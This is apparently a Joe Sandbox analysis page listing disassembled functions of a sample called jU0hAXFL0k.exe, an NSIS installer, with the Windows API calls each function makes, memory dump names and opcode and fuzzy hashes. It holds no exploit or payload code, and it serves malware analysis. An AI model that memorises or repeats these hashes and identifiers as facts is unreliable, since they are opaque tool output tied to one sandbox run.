                                                                                        Function 00401D41 Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?), ref: 00401D58
                                                                                        • GetClientRect.USER32(?,?), ref: 00401D9F
                                                                                        • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DCD
                                                                                        • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401DDD
                                                                                        • DeleteObject.GDI32(00000000), ref: 00401DF4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                        • String ID:
                                                                                        • API String ID: 1849352358-0
                                                                                        • Opcode ID: 7c7b994fc4d91fb582f8b78dced405722323d32c4ba5efb8ea940f8c293222a4
                                                                                        • Instruction ID: 879b8917e8c3c9b7c2a93b5436fc05cb0971dbd0d1073f8587bede8dddcc77ec
                                                                                        • Opcode Fuzzy Hash: 7c7b994fc4d91fb582f8b78dced405722323d32c4ba5efb8ea940f8c293222a4
                                                                                        • Instruction Fuzzy Hash: CC2196B2E04109AFDB01DF98DD44AEE7BB5FB48300F10803AF905F6290C7789941CB58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405A60 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00405FDA: lstrcpynA.KERNEL32(?,?,00000400,00403307,00422F00,NSIS Error,?,00000006,?,0000000A), ref: 00405FE7
                                                                                          • Part of subcall function 00405A0B: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,?,00405A77,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,76403410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,76403410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A19
                                                                                          • Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A1E
                                                                                          • Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A32
                                                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,76403410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,76403410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405AB3
                                                                                        • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,76403410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,76403410,C:\Users\user\AppData\Local\Temp\), ref: 00405AC3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsz7A32.tmp
                                                                                        • API String ID: 3248276644-3971072914
                                                                                        • Opcode ID: 3d72b69990c89283bdec6022929649575e9d0056fbfb1b91cb3bf573b4946918
                                                                                        • Instruction ID: fa13fd96d81fd76c8fc81ec80775158a1daeec84e0c55be597840f6fdc29cec0
                                                                                        • Opcode Fuzzy Hash: 3d72b69990c89283bdec6022929649575e9d0056fbfb1b91cb3bf573b4946918
                                                                                        • Instruction Fuzzy Hash: D5F0C825305D6616D62233361C85EAF1649CE82364715473FF851B12D3DB3C8943DE7E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405972 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403222,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,?,0000000A), ref: 00405978
                                                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403222,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,?,0000000A), ref: 00405981
                                                                                        • lstrcatA.KERNEL32(?,00409014,?,00000006,?,0000000A), ref: 00405992
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405972
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                        • API String ID: 2659869361-787714339
                                                                                        • Opcode ID: 76b30c2e26840082170464c0c63912d3f8204d685d5b784281808f5f32aeb92b
                                                                                        • Instruction ID: 0da8bf888325795cdd0c5347214511d48edcf337a1f8d4df24ff951c9a6f7455
                                                                                        • Opcode Fuzzy Hash: 76b30c2e26840082170464c0c63912d3f8204d685d5b784281808f5f32aeb92b
                                                                                        • Instruction Fuzzy Hash: C7D0A9A2605A716AD21223199C09EDB2A0CCF02314B080063F600B22A3CA3C1D018BFE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402C2E Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C93
                                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C9C
                                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402CBD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$Enum
                                                                                        • String ID:
                                                                                        • API String ID: 464197530-0
                                                                                        • Opcode ID: 73c9fb611972138edc71e9406aca9b8622a65655cc86fec515c5851ee22221db
                                                                                        • Instruction ID: a6da729fb9552a58d385ec1c0953cf8d4b7f97d7084d0a629d1ed2eab5a533bf
                                                                                        • Opcode Fuzzy Hash: 73c9fb611972138edc71e9406aca9b8622a65655cc86fec515c5851ee22221db
                                                                                        • Instruction Fuzzy Hash: 8E115B32904109BBEF129F50DE09B9E7B6DEB54380F104072BE05B51E0E7B59E11AAA9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405A0B Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,?,00405A77,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,76403410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,76403410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A19
                                                                                        • CharNextA.USER32(00000000), ref: 00405A1E
                                                                                        • CharNextA.USER32(00000000), ref: 00405A32
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp\nsz7A32.tmp, xrefs: 00405A0C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CharNext
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp
                                                                                        • API String ID: 3213498283-3296606243
                                                                                        • Opcode ID: 41ff5f2e282a09e2b8c2dcc033aaaa44e3aa2c06707c210a0f189d2452b315e7
                                                                                        • Instruction ID: a4ce128402f48f1feafc2c55b1118e7c053650975221e3f5fcc16cd8d0856992
                                                                                        • Opcode Fuzzy Hash: 41ff5f2e282a09e2b8c2dcc033aaaa44e3aa2c06707c210a0f189d2452b315e7
                                                                                        • Instruction Fuzzy Hash: 13F0C251B04F916BFB32A2280CD4F6B5B88CB55365F145267E280672C2C27C88408F9A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402D60 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(00000000,00000000,00402F3E,?), ref: 00402D73
                                                                                        • GetTickCount.KERNEL32 ref: 00402D91
                                                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402CDD,00000000), ref: 00402DAE
                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402DBC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                        • String ID:
                                                                                        • API String ID: 2102729457-0
                                                                                        • Opcode ID: 840a75d409b371d7b77b67c1e1f99b2f4b28fbc1840826de4c71681516a351cc
                                                                                        • Instruction ID: 88e2776c24fdb891b0502b3cf10dbd42b902845c03a9ebe61091678d0ea3e225
                                                                                        • Opcode Fuzzy Hash: 840a75d409b371d7b77b67c1e1f99b2f4b28fbc1840826de4c71681516a351cc
                                                                                        • Instruction Fuzzy Hash: E0F05E75905221ABCA207B62BE4CACA7BA4FB42B527014976F845B31E4C3784C868BDD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405075 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsWindowVisible.USER32(?), ref: 004050A4
                                                                                        • CallWindowProcA.USER32(?,?,?,?), ref: 004050F5
                                                                                          • Part of subcall function 004040B4: SendMessageA.USER32(00010410,00000000,00000000,00000000), ref: 004040C6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                        • String ID:
                                                                                        • API String ID: 3748168415-3916222277
                                                                                        • Opcode ID: add97a0a6925bc22265a7304b998d918bb161013fa4103ebff122d1b57fa8f8b
                                                                                        • Instruction ID: 69794148541a1a4d8d7be296dba567d41b1ee09d4c6a2f8e6d5670bc2f98cc64
                                                                                        • Opcode Fuzzy Hash: add97a0a6925bc22265a7304b998d918bb161013fa4103ebff122d1b57fa8f8b
                                                                                        • Instruction Fuzzy Hash: 3F017171100649ABDF219F11DD80A9F7A65EB84314F208037FA017A2D1D77A9C51DEEA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405679 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004056A2
                                                                                        • CloseHandle.KERNEL32(?), ref: 004056AF
                                                                                        Strings
                                                                                        • Error launching installer, xrefs: 0040568C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateHandleProcess
                                                                                        • String ID: Error launching installer
                                                                                        • API String ID: 3712363035-66219284
                                                                                        • Opcode ID: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
                                                                                        • Instruction ID: 7ab3ce879d7da258620b5dd87dc6aa02706b67d8cc8a7f981bd8ed1ee31a9d30
                                                                                        • Opcode Fuzzy Hash: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
                                                                                        • Instruction Fuzzy Hash: 46E046F0A00209BFEB009B60EC09F7B7AACEB10748F404861BD11F32A0E374A9108A79
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00403762 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(?,76403410,00000000,C:\Users\user\AppData\Local\Temp\,0040373A,00403554,?,?,00000006,?,0000000A), ref: 0040377C
                                                                                        • GlobalFree.KERNEL32(0057C310), ref: 00403783
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403762
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Free$GlobalLibrary
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                        • API String ID: 1100898210-787714339
                                                                                        • Opcode ID: c8d1562c69e49bacb52193c1b129ec66577e910d0a26dd744afe86c7ae1d1dec
                                                                                        • Instruction ID: ee514f1fc3f324b596d41214b75e1b85a5e4a54197580a2dff82031d974a72f0
                                                                                        • Opcode Fuzzy Hash: c8d1562c69e49bacb52193c1b129ec66577e910d0a26dd744afe86c7ae1d1dec
                                                                                        • Instruction Fuzzy Hash: 40E0C27380112097C7251F07EC04B5A776CAF45B22F01C02AEC007B3A0C7742C418BD9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004059B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402E30,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\jU0hAXFL0k.exe,C:\Users\user\Desktop\jU0hAXFL0k.exe,80000000,00000003), ref: 004059BF
                                                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E30,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\jU0hAXFL0k.exe,C:\Users\user\Desktop\jU0hAXFL0k.exe,80000000,00000003), ref: 004059CD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CharPrevlstrlen
                                                                                        • String ID: C:\Users\user\Desktop
                                                                                        • API String ID: 2709904686-3443045126
                                                                                        • Opcode ID: 1c4ce1fe46e37373cead662465a4f3eb2a6c0bdf31f922d28b251b51ad992424
                                                                                        • Instruction ID: a086819795abd80aa1ad59fb022c9920fa60cb9da26d6d2253466900a8022463
                                                                                        • Opcode Fuzzy Hash: 1c4ce1fe46e37373cead662465a4f3eb2a6c0bdf31f922d28b251b51ad992424
                                                                                        • Instruction Fuzzy Hash: 3FD0A7E3408DB05EE70353149C04B9F6A48CF12310F0900A3F180A21A6C67C1C414BFE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 6FE910E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064096219997.000000006FE91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE90000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064096174223.000000006FE90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064096271269.000000006FE93000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064096311549.000000006FE95000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_6fe90000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$Free$Alloc
                                                                                        • String ID:
                                                                                        • API String ID: 1780285237-0
                                                                                        • Opcode ID: b0ca44df10b43e5981dbca2bec097cf20f7a80a403f3a75379760c44d22770bb
                                                                                        • Instruction ID: 2e39068b96cff65f5dc7ec605e194ceaa9e433279b74551a1051b5c21cbaf247
                                                                                        • Opcode Fuzzy Hash: b0ca44df10b43e5981dbca2bec097cf20f7a80a403f3a75379760c44d22770bb
                                                                                        • Instruction Fuzzy Hash: 5531E4B1404600AFDB009FE9D944A6A7FFEFB07268B24411BE865C3250D739D821CB31
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405AD8 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE8
                                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B00
                                                                                        • CharNextA.USER32(00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B11
